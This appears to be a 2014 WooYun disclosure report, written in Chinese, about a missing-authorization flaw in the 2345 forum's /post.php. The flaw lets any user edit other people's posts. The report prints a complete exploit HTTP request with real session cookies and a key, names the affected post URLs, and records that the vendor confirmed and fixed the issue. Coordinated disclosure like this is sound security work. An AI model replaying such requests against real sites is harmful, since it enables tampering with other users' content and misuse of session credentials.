2345论坛过滤不严可任意编辑他人帖子 | wooyun-2014-070905

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2014-070905

漏洞标题：

2345论坛过滤不严可任意编辑他人帖子

漏洞详情

披露状态：

2014-08-04：细节已通知厂商并且等待厂商处理中
2014-08-06：厂商已经确认，细节仅向厂商公开
2014-08-16：细节向核心白帽子及相关领域专家公开
2014-08-26：细节向普通白帽子公开
2014-09-05：细节向实习白帽子公开
2014-09-18：细节向公众公开

简要描述：

喵还是卖萌~~~~

详细说明：

接口缺少过滤可以任意编辑他人帖子/任意编辑超过7天限制的帖子
问题接口:/post.php

POST /post.php HTTP/1.1
Host: wangpai.2345.cn
Proxy-Connection: keep-alive
Content-Length: 193
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Origin: chrome-extension://kajfghlhfkcocafkcjlajldicbikpgnp
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: user_info=NjQ0ZXpGdEJwMk5rRTNVMi9PTnNWZXpzTUoxbXlxaHBnNk9FK2dKY21VYmlhajdvY1Ara01xU2h3RFlxU09Z; I=i%3D332053%26u%3D958194%26n%3D654188164%26t%3D1407067341.76247900%26s%3Db4bf332239352cff252f64303859bb0a%26v%3D1.0; PHPSESSID=nt2315hhj7a41583m0e8md0ui1
title=%b2%e2%ca%d4%b1%e0%bc%ad%cb%fb%c8%cb%cc%fb%d7%d3&isBright=1&content=%b2%e2%ca%d4%b1%e0%bc%ad%cb%fb%c8%cb%cc%fb%d7%d3&id=2491986&postid=2491986&act=edit_post&fid=13&page=&key=d274ec87aacec1c8728692cf578c5c29

以上代码可以编辑如下帖子
http://wangpai.2345.cn/thread.php?fid=13&pid=2491986

漏洞证明：

http://wangpai.2345.cn/thread.php?fid=13&pid=2491986
http://wangpai.2345.cn/thread.php?pid=2491983&fid=13
http://wangpai.2345.cn/thread.php?fid=13&pid=2932812
如果用这个漏洞编辑置顶帖子的话,危害挺大的吧

修复方案：

过滤吧- -

版权声明：转载请注明来源 cat73@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-08-06 15:07

厂商回复：

漏洞已修复，感谢您对2345的关注

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 cat73@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 cat73@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞